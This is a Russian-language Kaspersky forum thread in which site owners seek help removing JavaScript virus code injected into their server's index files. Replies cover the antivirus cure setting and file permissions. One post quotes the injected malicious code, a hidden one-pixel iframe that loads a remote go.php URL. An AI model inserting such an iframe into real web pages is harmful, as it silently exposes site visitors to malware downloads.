Перейти к содержанию

Не лечятся файлы с вирусом на Linux сервере


mixey

Рекомендуемые сообщения

Как можно вылечить зараженные файлы на сервере (не предлагать ручное удаление вируса)?

Вирус: DoS.JS.Dframe.a

Операционная система на сервере: Fedora Core

Антивирус касперского находит файлы, но лечить отказывается.

 

Заражены файлы index.php (htm, html и пр расширения).

Может существуют какие-либо утилиты для удаления вредоносного кода?

Ссылка на комментарий
Поделиться на другие сайты

Есть Антивирус Касперского для Linux File Server - http://www.kaspersky.ru/anti-virus_linux_file_server

Загрузить пробную версию можно отсюда - http://www.kaspersky.ru/anti-virus_fileservers_trial

 

Кстати, компания Untangle совсем недавно назвала Касперского лучшим Linux-антивирусом ;)

 

ЗЫ Внушительный список антивирусов для Линукса (как платных, так и бесплатных) Вы можете посмотреть здесь - http://www.nixp.ru/soft/security_antivir

Изменено пользователем radioelectron
Ссылка на комментарий
Поделиться на другие сайты

Linux File Server и установил. Вирус находит, но не лечит, только удаляет.

Хотя нужно чтобы удалил только JSвирусный код.

Вручную удалить вирусный код очень тяжело (index файлов около 1500)

Ссылка на комментарий
Поделиться на другие сайты

Проверьте настройки антивируса - должен быть включен режим лечения (секция [scanner.options], параметр Cure=yes).

 

Также можно управлять приложением с помощью Kaspersky Administration Kit:

 

post-70-1187007328_thumb.gif

 

Вкладка "Параметры", пункт "Лечить зараженные объекты".

Изменено пользователем radioelectron
Ссылка на комментарий
Поделиться на другие сайты

Значит, остается только два варианта.

 

Если у Вас лицензия - можете зайти на страницу регистрации для клиентов Лаборатории Касперского. И из персонального кабинета написать в техподдержку конкретно по Вашему продукту.

 

И второй способ - попробовать что-нибудь из этого списка

Изменено пользователем radioelectron
Ссылка на комментарий
Поделиться на другие сайты

  • 3 weeks later...

У меня тоже с этим большая проблема. Сервер Linux, сайт http://kommersant.org.ua

 

Началось всё месяца два назад, когда Google заблокировал мой сайт, ссылаясь на вредоносное ПО а при открытии сайта -

АВК дико пищал, что найден вирус - Trojan-Downloader.JS.Psyme.jm - и блокировал сам сайт.

 

Тогда пересмотрел код главной страницы и нашел там такую запись:

<iframe src='http://ltds.biz/go.php?id=3240&user_name=gh0st' width='1' height='1' style='visibility: hidden;'></iframe>"

 

Удалил. Через три дня код опять появился на сайте. Я удалил - через неделю то же самое.

 

И так до сих пор. Хорошо, что index страниц там всего три - можно и ручками удалить. Может что посоветуете?

 

 

 

P.S. В вирусах я мало что пониманию. А антивирусом ЛК пользуюсь уже лет пять наверное. Лицензия - персональная.

Изменено пользователем Современник
Ссылка на комментарий
Поделиться на другие сайты

Может что посоветуете?

Ни в коем случае нельзя ставить права доступа к файлам 777. У Вас наверняка стоит разрешение на запись, и любой прохожий кулхацкер может запросто перезаписать любой файл вредоносным.

 

Если Вы не понимаете, о чем я говорю - смотрите сюда - http://omsk777.ru/all.php?act=dostup

Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
  • Похожий контент

    • Jortin
      От Jortin
      Доброго дня! Неизвестно когда успел подцепить вирус HEUR:Trojan.Multi.GenBadur.genw. 
      По поведению вируса все то же самое что и написано в его описании, сначала появляется окно с предложением лечения вируса с перезагрузкой, но после нее, он появляется  вновь. Файл автологгера прикрепляю.
      CollectionLog-2024.11.07-09.15.zip
    • jserov96
      От jserov96
      Шифровальщик запустился скорее всего из планировщика заданий ровно в 21:00 16 ноября в субботу.  Время указано на основе найденных зашифрованных файлов. Шифровальщик нашел все скрытые диски, подключил все бекапы, зашифровал все содержимое .vhd бекапов, и сами бекапы тоже зашифровал. Сервер отключен, диск с бекапами снят, зашифрованные .vhd файлы перенесены на другой диск, чтобы попробовать вытащить файлы. Шифровальщик шифрует первый 20000h байт файла и дописывает 300h байт в огромные файлы, видимо сделано для ускорения шифрования всего диска. Особенность: выполняемые файлы не шифруются!
      vx2.rar
    • barank1n
      От barank1n
      Висит примерно уже две недели. Руки дошли только сегодня. Установлен Kaspersky Anti-Virus. Kaspersky обнаруживает этот троян после каждого запуска ПК, даже после лечения.  Образ Windows не официальный. Прикрепляю к данной теме файл с логами.
      CollectionLog-2024.10.22-22.01.zip report1.log report2.log
    • whoamis
      От whoamis
      Добрый день зашифровало сервер, предположительно кто-то скачал картинку на сервере и открыл.
      Addition.txt FRST.txt 11.rar
    • website9527633
      От website9527633
      Добрый день! Возник вопрос при обращении агентов удаленно посредством запуска скрипта на рабочих станциях, вопрос: как в Агенте администрирования 15 на рабочих станциях, в скрипте указать пароль от удаления Агента администрирования?
      К примеру у меня скрипт отрабатывал таким образом, но в случае версии Агента администрирования 15, он запрашивает дополнительно пароль от удаления
      @echo off
      start "" "C:\Program Files (x86)\Kaspersky Lab\NetworkAgent\klmover.exe" -address 192.168.1.1 -silent
×
×
  • Создать...